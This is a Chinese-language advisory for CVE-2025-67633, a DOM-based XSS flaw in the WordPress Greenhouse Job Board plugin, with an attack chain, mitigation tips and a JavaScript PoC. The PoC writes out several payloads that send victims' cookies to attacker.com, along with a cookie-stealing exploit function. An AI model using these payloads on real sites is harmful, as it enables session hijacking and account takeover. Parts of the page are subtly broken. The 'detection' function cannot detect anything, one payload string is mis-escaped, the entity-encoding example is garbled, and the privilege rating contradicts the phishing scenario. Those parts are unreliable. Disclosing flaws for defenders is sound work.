CVE-2025-67633: WordPress Greenhouse Job Board插件DOM型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67633

漏洞类型

DOM-Based XSS

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

WordPress Greenhouse Job Board插件 (brownbagmarketing)

漏洞概述

CVE-2025-67633是WordPress平台下Greenhouse Job Board插件中的一个DOM型跨站脚本攻击（DOM-Based XSS）漏洞。该漏洞存在于插件的网页生成过程中，由于对用户输入的清理和转义不充分，攻击者可以通过在网页中注入恶意JavaScript代码来窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或篡改网页内容。DOM型XSS与传统的存储型或反射型XSS不同，它直接在客户端的DOM（文档对象模型）处理过程中被触发，漏洞代码位于JavaScript层面而非服务器端。该漏洞影响插件2.7.3及以下所有版本，由于该插件广泛应用于企业招聘网站，攻击者可能针对招聘页面或求职申请表单进行攻击，危害使用该插件的所有WordPress网站。

技术细节

DOM型XSS漏洞发生在Greenhouse Job Board插件的JavaScript代码中，该代码直接从URL参数或DOM元素中获取数据并动态插入到页面中而未进行适当的输出编码。攻击者可以通过构造特殊的URL参数或输入值，在页面加载时使浏览器执行恶意脚本。具体来说，攻击者可以在URL中添加类似'?param=<script>alert(document.cookie)</script>'的参数，或者在表单输入字段中注入恶意脚本。由于插件在处理用户输入时未使用textContent、innerText等安全方法或对特殊字符进行HTML实体编码（如将'<'编码为'<'），导致用户输入被浏览器解析为HTML或JavaScript代码执行。攻击成功的前提是用户访问攻击者构造的恶意链接，或者在存在输入点的页面提交包含恶意代码的内容。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标网站使用的WordPress Greenhouse Job Board插件版本

STEP 2

2

构造恶意载荷：攻击者构造包含XSS payload的URL参数或表单输入，如<img src=x onerror=...>或<script>标签

STEP 3

3

诱导用户访问：攻击者通过钓鱼邮件、社交工程或恶意链接诱导受害者访问构造的URL

STEP 4

4

漏洞触发：受害者浏览器加载页面时，恶意脚本代码被DOM解析器执行

STEP 5

5

数据窃取：恶意脚本读取用户Cookie、会话令牌或其他敏感信息并发送到攻击者服务器

STEP 6

6

账户劫持：攻击者利用窃取的凭证冒充受害者进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67633 DOM-Based XSS PoC
// Target: WordPress Greenhouse Job Board Plugin <= 2.7.3

// Malicious URL PoC - inject via URL parameter
const maliciousURL = 'https://target-site.com/jobs/?search=' + 
    encodeURIComponent('<img src=x onerror="fetch(\\'https://attacker.com/log?cookie=\\'+document.cookie)\\'">');

// Alternative PoC using script injection
const scriptInjection = 'https://target-site.com/jobs/?department=' +
    encodeURIComponent('<script>document.location="https://attacker.com/steal?data="+btoa(document.cookie)</script>');

// Form-based PoC (if input fields are vulnerable)
const formPoC = {
    action: 'Submit malicious input via job application form',
    payload: '<svg onload=fetch("https://attacker.com/exfil?"+document.cookie)>',
    method: 'POST to /wp-json/greenhouse/v1/submit-application'
};

// Detection script
function detectVulnerability() {
    const testPayload = '<img src=x onerror=alert(1)>';
    const inputs = document.querySelectorAll('input, textarea');
    inputs.forEach(input => {
        const originalValue = input.value;
        input.value = testPayload;
        const displayed = input.value;
        if (displayed.includes('<img') || displayed.includes('onerror')) {
            console.log('[VULN] Input sanitization missing');
        }
        input.value = originalValue;
    });
}

// Exploitation example
function exploitXSS() {
    // Steal session cookies
    const cookies = document.cookie;
    fetch('https://attacker.com/collect?c=' + btoa(cookies));
    
    // Or perform actions on behalf of user
    const form = document.querySelector('form');
    if (form) {
        // Malicious form submission
    }
}

影响范围

Greenhouse Job Board <= 2.7.3 (所有版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制未授权用户访问包含用户输入的页面；2) 使用WAF（Web应用防火墙）规则过滤XSS特征字符串；3) 临时禁用或替换该插件；4) 实施严格的输入验证和输出编码；5) 监控日志中的异常请求模式；6) 告知用户避免点击来源不明的招聘相关链接。